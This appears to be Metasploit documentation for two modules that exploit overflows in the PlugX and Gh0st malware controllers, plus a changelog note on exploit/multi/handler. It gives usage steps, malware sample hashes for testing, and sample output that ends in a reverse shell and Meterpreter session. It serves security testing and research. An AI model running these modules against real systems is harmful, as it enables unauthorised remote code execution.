This module exploits a stack overflow in the Plug-X Controller when handling a larger than expected message. This vulnerability can allow remote code execution however it causes a popup message to be displayed on the target before execution is gained.
## Verification
Run the PlugX C2 server on a target windows machine. The sample 9f59a606c57217d98a5eea6846c8113aca07b203e0dcf17877b34a8b2308ade6 is a Plux Type 1 server that works good for testing.
- [ ] use exploit/windows/misc/plugx
- [ ] set RHOST [ip of target]
- [ ] set target 1
- [ ] exploit
- [ ] acknowledge the "PeDecodePacket" message on the target
Sample output:
msf> use exploit/windows/misc/plugx
msf exploit(plugx) > set rhost
rhost =>
msf exploit(plugx) > set target 1
target => 1
msf exploit(plugx) > check
[*] - "\x03\xB0\x02\x00\x04\x00"
[*] The target appears to be vulnerable.
msf exploit(plugx) >
This module exploits a buffer overflow in the Gh0st Controller when handling a drive list as received by a victim. This vulnerability can allow remote code execution
## Verification
Run the Gh0st C2 server on a target windows machine. The sample 0efd83a87d2f5359fae051517fdf4eed8972883507fbd3b5145c3757f085d14c is a Gh0st 3.6 server that works good for testing.
- [ ] use exploit/windows/misc/gh0st
- [ ] set RHOST [ip of target]
- [ ] exploit
Sample output:
msf > use exploit/windows/misc/gh0st
msf exploit(gh0st) > set rhost
rhost =>
msf exploit(gh0st) > exploit
[*] Started reverse TCP handler on
[*] - Trying target Gh0st Beta 3.6
[*] - Spraying heap...
[*] - Trying command 103...
[*] Sending stage (957487 bytes) to
[*] Meterpreter session 1 opened ( -> at 2017-07-29 10:11:4
This gives exploit/multi/handler a makeover, updating to use more-or-less
standard Ruby, and removing any mystical hacks at the same time (like select
instead of sleep).
This also gives it a Passive stance, and sets ExitOnSession to be false by
default, which is the setting that people use 99% of the time anyway.